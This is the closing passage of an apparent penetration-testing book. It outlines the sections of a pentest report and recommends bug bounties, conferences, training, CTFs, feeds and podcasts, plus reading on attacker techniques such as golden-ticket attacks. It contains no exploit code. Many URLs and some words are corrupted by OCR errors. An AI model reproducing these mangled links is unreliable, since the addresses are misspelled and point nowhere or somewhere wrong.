are to be tested. It should also explain the purpose of the test. 

• Deviations from the Statement of Work 

o Many tests have changes from the original requirements, such as 
having to stop testing on a host, to stop scanning, and/or make changes 
to the testing windows. 

• Methodology 

o A high-level description of the testing process and standards. 

• Significant Assessment Findings 

o This section should be dedicated to critical findings. 

• Positive Observations 

o This part is just as important as the significant findings. No one likes 
to see a whole report where their company is beat up. Talking about 
what the company did well helps lessen the blow on where fixes need 
to be made. 

• Findings Summary 

o Overall view on the findings broken down by severity, 
o Conclusion of summary that explains if the environment was found to 
be vulnerable for any opportunities for exploitation. 

• Detailed Findings 

o This should include severity, vulnerability definition, issue/detailed 
description/risks, asset, recommendation, snapshots/logs/how to 
exploit walkthrough 

• Appendix 

o Listing of all assets and ports 
o Additional information and snapshots 

Some examples of reports: 

http://isecpartners.github.io/publications/iSEC_Cryptocat_iOS.pdf 

https://www.offensive-security.com/reports/penetration-testing-sample-report-2013.pdf 

http: / / www .pentest- standard, or g/ index.php/Reporting 
http://resources.infosecinstitute.com/writing-penetration-testing-reports/ 








There are times when I generate a second report, based on the client. The second report will be 
directed toward higher management and will discuss the systemic issues and patterns of gaps in 
security. This shouldn’t be very detailed or technical, but should mainly state facts at a high-level, 
based on the test. 

Lastly, if you want to set yourself apart from other pentesters, try to find ways to give yourself added 
value that others may not offer. For example, if you are doing a PT for a large company, you can 
provide a simple OSINT (Open Source Intelligence) report, in addition to the final report, to describe 
what and who can be publicly found from the Internet. There have been times when I created scripts 
(Python, PowerShell, Bat) that perform checks against critical findings, so that after they remediate 
their systems, they can just execute the script to verify. 



Continuing Education 


So, you have just finished this book and may have a thirst for more. One of the most important factors 
in succeeding in this field is that it takes experience-not just learning from books and videos. Start 
learning from labs and vulnerable VMs. If you do not currently work for a penetration testing 
company, start working on bug bounties. Bug bounties are legal ways to find security bugs on 
production sites. Remember to read ALL the fine print before doing any testing. 


Bug Bounties: 

• https://bugcrowd.com/list-of-bug-bounty-progranis 

• http: / / www .bugsheet.com/bug-bounties 

Secondly, if you aren’t involved in the security community, you’re doing it wrong! It is easy to get 
involved. There are a ton of local security groups in every city: 


B-sides: http://www.seeuritybsides.eom/w/page/12194156/FrontPage 
OWASP: https://www.owasp.org/index.php/OWASP Chapter 
Hacker Spaces: http://hackerspaces.org/wiki/List_of_hackerspaces 


Major Security Conferences: 


If you are looking for the bleeding-edge research, security conferences are the place to go. It is a great 
place to meet like-minded individuals, get your hands dirty, and learn. Two major websites that have 
a great list of security conferences are: 

• https://secore.info/conferences 

• http://infosecevents.net/calendar/ 


I will give you a small sample of the conferences that I would recommend from personal experience 
(in no particular order): 

• DefCon flittp://www.defcon.orgA - This is one of the largest hacker conferences in 
the world and takes place in Las Vegas, NV This conference is a must and is 
relatively affordable. 

• DerbyCon t https://www.derbycon.comA - Another relatively low-cost conference, 
which takes place in Kentucky. Some of my favorite talks have come from DerbyCon. 

• BlackHat f http://www.blackhat.com/ l - This conference is also held in Las Vegas, 
NV and is directed more toward corporate employees. It has great speakers, but is 
extremely expensive. 

• Bsides r http://www.securitybsides.comA - There are Bsides conferences all over 
the country and are usually FREE. Find yours! 

• ToorCon f http://toorcon.nct/ l - This is one of the smaller conferences and is held in 














San Diego, CA. You will meet a lot of new people here and everyone is pretty 
friendly. 

• CanSec ( http://cansecwest.com/ ) - CanSecWest conference is one of the more 
technical conferences. Although, extremely pricey, it is best known for its PWN20WN 
contest. 

• Shmoocon ( http://www ■shmoocon.org/ ) - One of the largest conferences on the east 
coast and usually under $200. This is one of my favorite conferences. 

• OWASP AppSec 

( http s: //w w w. o wasp. or g/ index, php/Cate gory: O WASPApp SecConfer enc e ) - Cheap 
and fun conference focused on web application security. Cost is typically under $100 
if you are an OWASP member. 

• Lethal ( http://www.meetup.com/LETHAL/ ) - Of course, I have to include my group. 
Although, it is not a conference, we have monthly meetups and have presenters. Not 
only is it free, but the group is small, so it is easy for you to get involved and meet 
others with similar interests. If you are in the LA/Orange County CA area, come by! 

• The Ethical Hackers Club (TEHC) - This is one of my old groups in the Maryland 
area. TEHC is open for anybody with or without experience in network and computer 
security. They offer an open forum of discussion and informal training on anything 
network and computer security related. Sign up a t www.t-e-h-c.com or 
http://www.meetup.com/ethical-hacker-club . 


But don’t forget, sometimes the best conferences are those that are local. They might not have the most 
famous speakers or most professional setting, but this is where you will find people just like you. I 
find that the people at the local events are much more open to sharing and working on projects 
together. 


Training Courses: 


If you are looking for a jumpstart into a particular field in security, you would most likely benefit 
from a training course. Since there are so many different training courses to choose from, here are 
some recommendations: 

• BlackHat - This one is pretty expensive, but it offers a lot of different courses, 
which are taught by some of the best. 

• DerbyCon - Well-priced training in Kentucky and occurs during the conference. 

• SANS ( http://www.sans.org ) - Expensive training, but they are the industry 
standard. 

• Offensive Security f http://www.offensive-security.com/ ) - Well-priced and I highly 
recommend taking the online Offensive Security courses. You get a lot of great hands- 
on experience, but will need to invest a lot of time. 

• Exodus - f https://www.exodusintel.com/training.html ) - Excellent training course 
for advanced vulnerability and exploitation courses. 











Free Training: 


• Offensive Computer Security FSU: 

http: / / www.es. fsu. edu/-redwood/Offensi veComputer Security/ 

• Pentesterslab: https://pentesterlab.com/exercises/ 

• Cybrary: http://www.cvbraryit/ 

• Open Security Training: http: //opcnsccuritytraining.info/Training.html 

• Coursea: https://www.coursera.org 

• EdX: https://www.edx.org/ 


Capture The Flag (CTF) 


If you plan to make this your profession or even if you do this for fun, you really need to get involved 
with different CTF challenges. Try to find a few friends or maybe find your local security group to 
attempt these challenges. Not only will it test your skill and understanding of attacks, but you will 
also be able to better connect with other people in the industry. Spending three days and nights doing 
a challenge is probably one of the most rewarding experiences. 

Go visit https://ctftime.org and find out where and when the next CTFs are. If you are in the Orange 
County, CA area, stop by www.meetup.com/lethal and join one of our teams! 


Keeping Up To Date 


Here are a list of RSS feeds I monitor on a daily basis. I made it small enough so that I can quickly 
look through it all in a matter of minutes: 

• http://www.securepla.net/rss.php 


Mailing Lists 


• Seclist.org has taken over what used to be Full Disclosure. This is a vendor-neutral 
forum for detailed discussion of vulnerabilities and exploitation techniques, as well as 
tools, papers, news, and events of interest to the community. 

o http://seclists.org/fiilldisclosure/ 

• Dragon News Bytes - Great topics on everything such as privacy, tools, malware, 
attacks, presentations, and more. 

o https://www.team-cymru.org/News/dnb.html 


Podcasts 













I have actually moved over to listening to podcasts versus just reading RSS feeds. Are you looking 
for bleeding-edge security issues being discussed by some of the best? Take a spin through some of 
these: 


• Brakeing Down Security - http://brakeingsecurity.blogspot.com/ 

• Risky Business - http://risky.biz/netcasts/risky-business 

• Security Now - https://www.grc.com/securitynow.htm 

• Security Weekly - https://securityweekly.com/podcasts/ 

• The Social-Engineer Podcast - http://www.social-engineer.org/category/podcast/ 

• Hak5 - https://itunes.apple.com/us/podcast/hak5-quicktime-large/idl 17137282? 
mt=2 

• SecuraBit - https://itunes.apple.com/us/podcast/securabit/id280048405 


Learning From The Bad Guys 


When I teach my penetration testers, one of the most important things I tell them is to watch what the 
bad guys do. Not only does it help extend the attack process, but it also helps with lateral movement 
and learning what works in the real world. One of the main reasons my clients hire me is to emulate 
what the bad guys might do. If you are using theoretical attacks, this might not be as beneficial as 
using the tactics that their adversaries might try to do. 


Also, make sure you learn about your client’s industry. If their attacks use PDFs versus credential 
compromise, you might want to focus your attacks on those types. The more you can emulate their 
patterns, the better the company can protect themselves against their most immediate threats. 


Some Examples: 


Kerberos Golden Ticket Attacks and Sticky Keys 

• http://blog.cobaltstrike.com/2015/01/07/pass-the-golden-ticket-with-wmic/ 
FireEye/Mandiant APT Tools and Techniques 

• https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf 
CrowdStrike Blog 

• http://blog.crowdstrike.com/ 

Verizon Data Breach Report 

• http: / / w ww. verizonenterprise. com/DBIR/ 2014/reports/rp_Verizon-DBIR- 
2014_en_xg.pdf 

Skeleton Key Attack 

• http: //www. secureworks .com/ cvher-threat-intelli gence/threats/skeleton-kev- 
malware-analysis/ 


For any good penetration tester, doing research should be half your time. Fearning what the bad guys 

















do and being able to emulate them will be useful to your job, and even more useful to your client. 



Final Notes 


Now, you have fully compromised the SUCK organization, cracked all the passwords, found all of 
their weakness, and made it out clean. It is time to take everything you learned and build on top of 
that. I have already recommended that you get involved with your local security groups and/or 
participate in security conferences. You can also start a blog and start playing with these different 
tools. Find out what works and what doesn’t and see how you can attack more efficiently and be 
silent on the network. It will take some time outside your normal 9-to-5 job, but it will definitely be 
worth it. 


I hope you have found the content in this book to be something of value and picked up some tips and 
tricks. I wrote this second book mainly because security is always changing and it is really important 
to stay on top of your game. As I have emphasized throughout this book and the prior one, there isn’t a 
point when you can say you have mastered security. However, once you have the basics down pat, the 
high-level attacks don’t really change. We see time and time again that old attacks come back and that 
you always need to be ready. 

If you did find this book to be helpful, please feel tree to leave me a comment on the book’s website. 
It will help me to continue developing better content and see what topics you would like to hear more 
about . If I forgot to mention someone in this book or I misspoke on a topic, I apologize in advance 
and will try my best to provide updated/corrected information on the book website. 

Subscribe for Book Updates: 

http: //thehackerplaybook. com/ subscribe 

Twitter: @HackerPlaybook 
URL: http://TheHackerPlaybook.com 
Github: https://www.github.com/cheetz 
Email: book@thehackerplaybook.com 


*From the last book, I know that many of you downloaded copies of my book through less than legal 
means. Although I don’t promote it, I am glad that I was able to share my knowledge and hope this 
continues your interest in computer security. If you did happen to stumble on this copy somewhere on 
the “internets” and did like my book, feel tree to donate to the BTC address below. All proceeds will 
go directly to LETHAL Hittp://www. meetup.com/lethal/ ) to promote the growth of our security 
community. 


Happy Hacking! 
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